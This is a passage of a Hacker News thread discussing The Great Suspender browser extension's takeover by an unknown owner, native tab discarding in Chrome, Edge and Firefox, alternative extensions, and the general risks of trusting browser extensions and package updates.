| "Install Add-on From File...", and I don't have a problem
| trusting myself.)
| bovine3dom wrote:
| I don't think this is is true for the official Mozilla
| builds (except for Nightly, Beta and unbranded). It's
| possible that your distro has a custom build that allows
| the setting. Arch builds Firefox with `--allow-addon-
| sideload` which could be the culprit.
| Arnavion wrote:
| Ah indeed. My distro also builds with `--allow-addon-
| sideload`
| bovine3dom wrote:
| No promises that that's actually the right flag. I had a
| rummage around searchfox and it looks like that just
| enables extensions that have been placed in special
| directories (whether they must be signed or not is a
| different flag). There clearly is a setting somewhere
| though as the unbranded builds exist...
| jannes wrote:
| So you have to use an experimental version of Firefox.
| These nightly versions are less tested and can be a serious
| downgrade from any stable browser.
|
| That's hardly what "Use Firefox" implied.
| Semaphor wrote:
| The Developer Edition is not a nightly build, it's a beta
| build, so there has been some testing (Before I switched
| to stable, I only once had an issue). Your point stands
| though.
| bovine3dom wrote:
| You can use unbranded builds which are pretty much
| identical to the stable releases but let you use unsigned
| extensions.
|
| https://wiki.mozilla.org/Add-
| ons/Extension_Signing#Unbranded...
| kibwen wrote:
| I can see why you'd think that but in practice I assure
| you that your concern is unwarranted. I've been using
| Nightly Firefox exclusively for almost ten years and I
| honestly can't remember it ever crashing (excluding the
| times when I was manually futzing with experimental
| about:config flags back in the electrolysis days).
|
| As for the developer edition, it's literally the version
| that they expect web developers to use; it's not half-
| baked software by any means.
| kchr wrote:
| "Stable" doesn't necessary medan that it is secure, from
| an end-user perspective.
| AlphaWeaver wrote:
| Chrome sideloads extensions through a similarly obscure menu
| - My main quarrel is the prompt where the _default option is
| to uninstall_ that appears on every launch. Firefox doesn 't
| have that.
|
| Firefox also permits self-hosting extensions signed through
| their store, providing more freedom for extension developers.
| asddubs wrote:
| yeah i kind of hate it but i can't really blame them for
| doing it, since before they did that, if you installed
| software from questionable sources like, say, java from the
| oracle website, it would bundle an ask toolbar with it. and
| this was so common
| Karunamon wrote:
| _Kudos?_
|
| Availability is part of security, and the most secure system
| is disconnected from the internet and powered off. Why are we
| cheering our software becoming _less_ useful in the name of
| safety? The switch to WebExtensions was a monstrous loss of
| functionality!
| [deleted]
| albertgoeswoof wrote:
| Or you can use https://www.one-tab.com/ or https://tab.bz for a
| similar-ish use case
| TheRealPomax wrote:
| Is there a reason this extension still exists, given that tabs
| get heavily deprioritized when not in focus, and have been for
| many, many versions now?
| spiffytech wrote:
| Chrome throttles tab CPU activities when backgrounded, but
| doesn't clear memory for the tab. For users like me who usually
| have 50-800 tabs open across all my browser windows, that
| _really_ adds up. I also appreciate (err... appreciated) The
| Great Suspender because I didn 't want _all_ of those tabs
| active _every_ time I opened a browser, so I 'd have scores of
| tabs that never even got loaded, but were ready to go the
| moment I wanted to return to them.
| shawnz wrote:
| Chrome does discard the memory of tabs that haven't been used
| recently and Great Suspender can be configured to make use of
| that functionality.
| dbbk wrote:
| They get throttled but still kept in memory. This drops them
| from memory.
| alyandon wrote:
| The MS Edge dev channel has a basic form of tab suspending built
| into it now. Based on my non-rigorous testing it seems to
| actually save more memory than TGS ever did so I just removed the
| extension entirely.
|
| It is really a shame that basic functionality like this isn't
| built into more browsers and we have to rely on extensions to
| fill the gaps just to keep memory usage under control for tab-a-
| holics like myself. :(
| davidfstr wrote:
| > It is really a shame that basic functionality like this isn't
| built into more browsers and we have to rely on extensions to
| fill the gaps just to keep memory usage under control for tab-
| a-holics like myself. :(
|
| The way I see it, extension developers get to come up with
| innovative new features first, and then the first-party vendors
| like Apple, Google, and Microsoft take note and eventually do
| just that: Integrate it into their own products.
|
| For example: The Great Suspender - Sleeping Tabs [experimental]
| (Microsoft/Edge); Flux - Night Shift (Apple/iOS); Growl - macOS
| Notifications (Apple/macOS); Swype - iOS Built-in Keyboard
| (Apple/iOS); etc
|
| Edit: Fix formatting.
| shawnz wrote:
| In fact tab suspending/discarding has been built into Chrome
| for some time now and Great Suspender does optionally make use
| of the built-in functionality.
|
| I still sometimes use extensions like Great Suspender to give
| more control over the process (e.g. to suspend more
| aggressively on RAM-constrained machines or where the user uses
| a lot of tabs).
|
| Since this news came out I have switched to "Auto Tab Discard".
| jannes wrote:
| Chromium-based browsers and Firefox have discarding built-in.
|
| chrome://discards/ has some advanced options (in Chromium-based
| browsers).
|
| Funnily enough, Google mentions The Great Suspender as
| inspiration for this feature in the August 2015 changelog:
| https://developers.google.com/web/updates/2015/09/tab-discar...
|
| > We actually had a great chat with the author of the Great
| Suspender extension while developing tab discarding and they're
| glad to see us natively tackling this problem in ways that are
| more efficient than an extension might be able to, such as
| losing the state of your user inactions.
| dbbk wrote:
| The functionality is built-into Chrome, the native tab
| discarding just happens when it thinks memory pressure is too
| high. Extensions like this give you extra granularity to set it
| to happen after a timer.
| MacroChip wrote:
| Does this extension add functionality beyond Chrome's existing
| tab suspension?
| jeromeparadis wrote:
| There's a reason why I don't install any extension except a
| password manager.
| otterpro wrote:
| Wow, this is why just recently my Macbook pro was registering
| high CPU usage even when all tabs were asleep using Great
| Suspender. For some reason, Chrome was registering high CPU
| usage, and I thought it was some Chrome bug.
| michaelcampbell wrote:
| You lost me. What's this "this" in "this is why", exactly?
| angryasian wrote:
| there really needs to be a better bookmarking solution.
| asadkn wrote:
| I have always used The Great Discarder instead [1]
|
| It's by the same dev too but it uses Chrome's Native Tab
| Discarding feature and I found it way more efficient (at the time
| I started using it a few years ago - haven't compared recently).
|
| [1] https://chrome.google.com/webstore/detail/the-great-
| discarde...
| monkpit wrote:
| I like the idea of using the discard mechanism, but if it's
| from the same developer, wouldn't it be at risk of having the
| same thing happen?
| asadkn wrote:
| True that's possible if it were to get popular. But since
| this wasn't the popular extension, it'd seem it wasn't sold
| off.
| shawnz wrote:
| Great Suspender eventually added functionality to use Chrome's
| native tab discarding as well and so they stopped updating
| Great Discarder.
| pjmlp wrote:
| I just don't use extensions, so no need to worry about such
| scenarios.
| StellarTabi wrote:
| The lack of user control, lock files, granularity of controls
| over browser extensions has gone too far.
| Aardwolf wrote:
| Doesn't chrome already suspend background tabs without plugin? At
| least I'm unable to properly have browser games running unless
| they're in a visible tab.
| rolfvandekrol wrote:
| Browser games, implemented in Javascript, usually depend on
| requestAnimationFrame, which is not executed in background
| tabs. See https://developer.mozilla.org/en-
| US/docs/Web/API/window/requ... for more info.
| mtoddsmith wrote:
| Seems there should be an extension which checks other extensions
| for nefarious activity or notifies you of the events that are
| mentioned in the article.
| dr-detroit wrote:
| You've heard of first world problems this is Martian problems
| like seriously you cant manage chrome tabs yourself
| istorical wrote:
| anyone able to compare Tiny Suspender and Auto Tab Discard?
| qwerty456127 wrote:
| By the way, is there an extension (I'm interested in both Firefox
| and Chrome) which would force all the new (background) tabs to be
| created in the suspended state (like if you had opened them in
| background and then restarted the browser) and only start loading
| after you actually open them?
| kchr wrote:
| Same here!
| gneray wrote:
| Ditto
| vmception wrote:
| Uninstalled and reported.
| orliesaurus wrote:
| Lifehack: export your suspended tabs as a flat file through the
| interface, uninstall the add on, then follow the downgrade as the
| blog suggests, at the end reimport your tabs from the flat file
| AQXt wrote:
| > Apparently recent versions of this extension have been taken
| over by a shady anonymous entity...
|
| That's something that worries me, whenever I install a software
| with trusted privileges.
|
| Software companies can sell their products -- and user base -- to
| other companies without notice.
|
| And it can be even worse in the free software world: think about
| all the updates that happen when you type `apt-
| get|yum|brew|npm|pip update`. What are the odds of a single
| dependency being taken over by a shady anonymous entity?
| [deleted]
| acdha wrote:
| This is why I stopped using extensions in any browser years ago
| unless it came from a trusted company I pay directly (i.e.
| 1Password). The broken economic model means that the developers
| always have pressure to cash in on a popular extension and Google
| has set things up to make abuse fast and easy with automatic
| silent updates and their usual skimping on human review. By the
| time the news about TGS came out most users already had the next
| release installed.
| jeffbee wrote:
| Indeed. There was never a basis for trusting The Great
| Suspender in the first place. "Read and change all your data"
| is a permission that should be reserved for code you wrote
| yourself.
| Centigonal wrote:
| More discussion on GitHub:
| https://github.com/greatsuspender/thegreatsuspender/issues/1...
|
| Quite similar to what happened to Nano Adblocker/Defender a few
| months ago.
| [deleted]
| gruez wrote:
| previous discussion:
| https://news.ycombinator.com/item?id=25622015
| [deleted]
| jancsika wrote:
| > Disable analytics tracking by opening the extension options for
| The Great Suspender and checking the box "Automatic deactivation
| of any kind of tracking".
|
| > Pray that the shady developer doesn't issue a malicious update
| to The Great Suspender later. (There's no sensible way to disable
| updates of an individual extension.)
|
| Does Debian ship packages for individual browser extensions?
|
| I mean, if they do I'm sure it's not scalable and-- after
| spending time reading debuild manual-- a giant, archaic pain in
| the ass.
|
| On the other hand, all these app delivery systems are so damned
| pernicious and require constant vigilance. We may have arrived at
| a moment in time where this is actually a difficult decision:
|
| * pay somebody a living wage to burrow down into Debian's WoT
| bureaucracy and add at least a selection of this functionality
| _without_ phoning home
|
| * continue playing the most tedious game of whackamole with a
| whackamole game that mines all our data in order to learn how
| best to beat all users at whackamole
| [deleted]
| vaduz wrote:
| > Does Debian ship packages for individual browser extensions?
|
| They do, for a couple of more notable ones (HTTPS Everywhere,
| uBlock Origin, Proxy Switcher, etc.) [0]
|
| > I mean, if they do I'm sure it's not scalable and-- after
| spending time reading debuild manual-- a giant, archaic pain in
| the ass.
|
| The biggest problem is to find a person to be a maintainer that
| is willing to keep up with the upstream development.
|
| [0]
| https://packages.debian.org/search?keywords=webext-&searchon...
| wintermutestwin wrote:
| At this point, I would gladly pay good money for a browser that
| prevented ads and tracking, provided most of the standard plugin
| functionality oob and vetted the rest. This whole mess is a
| massive time suck.
| [deleted]
| abecedarius wrote:
| I'm using Brave. Not sure it exactly matches what you want, but
| it's the closest I've found.
| skrowl wrote:
| Just sent him this email:
|
| Saw your article via HN.
|
| As an easier permanent fix, just uninstall The Great Suspender
| and install Auto Tab Discard (https://add0n.com/tab-
| discard.html). It does the same thing.
|
| It's available on:
|
| Firefox - Auto Tab Discard - Get this Extension for Firefox (en-
| US)(https://addons.mozilla.org/en-US/firefox/addon/auto-tab-
| disc...)
|
| Edge - Auto Tab Discard - Microsoft Edge Addons
| (https://microsoftedge.microsoft.com/addons/detail/auto-tab-d...)
|
| or even if you're still using Chrome - Auto Tab Discard - Chrome
| Web Store (https://chrome.google.com/webstore/detail/auto-tab-
| discard/j...)
| jschuur wrote:
| Discarding inactive tabs is not what I use The Great Suspender
| for. I use it to... suspend tabs. Auto Tab Discard doesn't seem
| to do that.
| shawnz wrote:
| Discarding the tab is superior to what Great Suspender used
| to do. Why would you want the old behaviour?
|
| Tab discarding is just a more efficient, native
| implementation of what Great Suspender aimed to do in the
| first place.
| Arnavion wrote:
| I don't use Chrome so I have no idea what either of these
| extensions did, but FF's implementation of tab discarding
| causes it to reload the page when I switch to the tab,
| which means I have to wait for the page to load before I
| can do whatever I wanted to do.
|
| I'd much rather have a way to just stop all JS on a
| "suspended" tab so that FF doesn't burn 20% CPU on tabs
| that aren't even visible. (Yes I'm aware that JS timers,
| etc operate at reduced frequency for unfocused tabs. I'm
| talking about stopping them entirely.) Discarding may be
| more efficient for the browser but it's less efficient for
| me the user, so I don't use it.
| shawnz wrote:
| Fair enough, although that is not what Great Suspender
| did. Great Suspender also causes the page to be reloaded
| on resumption, just like an early version of tab
| discarding.
|
| Tab discarding does have the slight advantage that it
| remembers what you typed in on the page and where you
| were scrolled (but nonetheless still causes a reload).
|
| What you are asking for regarding slowing the performance
| of background JS is something browsers already do:
| https://stackoverflow.com/questions/15871942/how-do-
| browsers...
|
| Making that behaviour more aggressive seems like it is
| liable to cause significant problems to the user
| experience with minimal benefits. E.g. background media
| playback would likely be broken, notifications, etc.
| Whereas you could simply use bookmarks instead of open
| tabs to get the same effect
| Arnavion wrote:
| >What you are asking for regarding slowing the
| performance of background JS is something browsers
| already do
|
| As I wrote:
|
| >>(Yes I'm aware that JS timers, etc operate at reduced
| frequency for unfocused tabs. I'm talking about stopping
| them entirely.)
|
| >Making that behaviour more aggressive seems like it is
| liable to cause significant problems to the user
| experience with minimal benefits. E.g. background media
| playback would likely be broken, notifications, etc.
|
| I want none of those things from the "suspended" tabs.
|
| >Whereas you could simply use bookmarks instead of open
| tabs to get the same effect
|
| How? Do you mean I would load the bookmark into a new tab
| when I wanted to visit it? That not only has the same
| problem that I described for discarded tabs (have to wait
| for a page load), but is even worse because it loses all
| the context that discarded tabs do retain. Not to mention
| the annoyance of maintaining bookmarks for arbitrary tab
| groups that I just happen to have open.
| [deleted]
| [deleted]
| loceng wrote:
| Ah damn, I was about to try it to see if it actually
| discarded or suspended tabs.
| fudged71 wrote:
| What is the difference?
|
| From the website it sounds like the favicon is changed. So
| the tab doesn't go away it's just on pause
|
| Google: " a discarded tab doesn't go anywhere. We kill it but
| it's still visible on the Chrome tab strip. If you navigate
| back to a tab that's been discarded, it'll reload when
| clicked. Form content, scroll position and so on are saved
| and restored the same way they would be during
| forward/backward tab navigation."
|
| In the future this will be updated to also use a serializer
| for discarded tabs.
| kchr wrote:
| Discard doesn't mean "remove" in this context. It will unload
| the tab, but still keep the state for when you switch back to
| it. E.g. suspend it.
| nguyenkien wrote:
| Edge (dev) has built-in sleep tabs. It work quite good
| michaelcampbell wrote:
| I wish they had one that would do that based on memory or CPU
| usage of a tab.
| spiffytech wrote:
| Auto Tab Discard has a setting, "Discard a background tab if
| its memory usage (totalJSHeapSize) exceeds (in MB)"
| michaelcampbell wrote:
| Greyed out for me in FF. =\
| tyingq wrote:
| I'm now curious how much money the original developer was paid to
| hand it over. I imagine he/she knew what the buyer's plan was.
| probably_wrong wrote:
| According to the homepage of a company that buys apps, and as a
| first approximation, that would be "anywhere between 8x - 36x
| monthly revenue for apps. In most cases this is well above the
| standard market value of 6-12x".
|
| Whether they are lowballing candidates with that offer, I can't
| say.
| iamspoilt wrote:
| Uninstalled. Period.
| [deleted]
| jakobpb wrote:
| Uh, just use Firefox. Problem solved for both functionality and
| security.
| dstick wrote:
| More detailed information can be found here:
| https://github.com/greatsuspender/thegreatsuspender/issues/1...
___________________________________________________________________
(page generated 2021-01-20 23:00 UTC)